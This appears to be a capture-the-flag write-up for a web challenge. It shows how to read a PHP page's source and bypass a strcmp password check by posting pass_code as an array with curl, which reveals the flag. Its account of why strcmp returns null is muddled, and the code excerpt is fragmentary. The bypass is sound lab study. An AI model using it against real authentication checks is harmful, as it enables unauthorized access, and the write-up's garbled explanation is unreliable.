First of all we go into the website html and we see a comment:

It tells us that we can view the source code if we will send source param, so we try to send it via GET first, https://find-pass-code-one.kshackzone.com/?source

and it works, now we have the page source code:
```
";

}

}

if (isset($_GET["source"])) {

print show_source(__FILE__);

}

?>
```

we see by this line: `if (isset($_POST["pass_code"]))`

that we have to set the pass_code to something, and to get the flag we need to pass this compare:

`if (strcmp($_POST["pass_code"], $flag) == 0 )`

now in php null==0 returns true and strcmp(nothing, anything) will always return null,

so we try to give it nothing, a space(%20 if it was via GET but its in post so we can just write " ")

we will do it with curl but you can do it with anything you like:

$ curl -X POST -d "pass_code[]= " https://find-pass-code-one.kshackzone.com/

and we get the flag:

KCTF Flag : KCTF{ShOuLd_We_UsE_sTrCmP_lIkE_tHaT}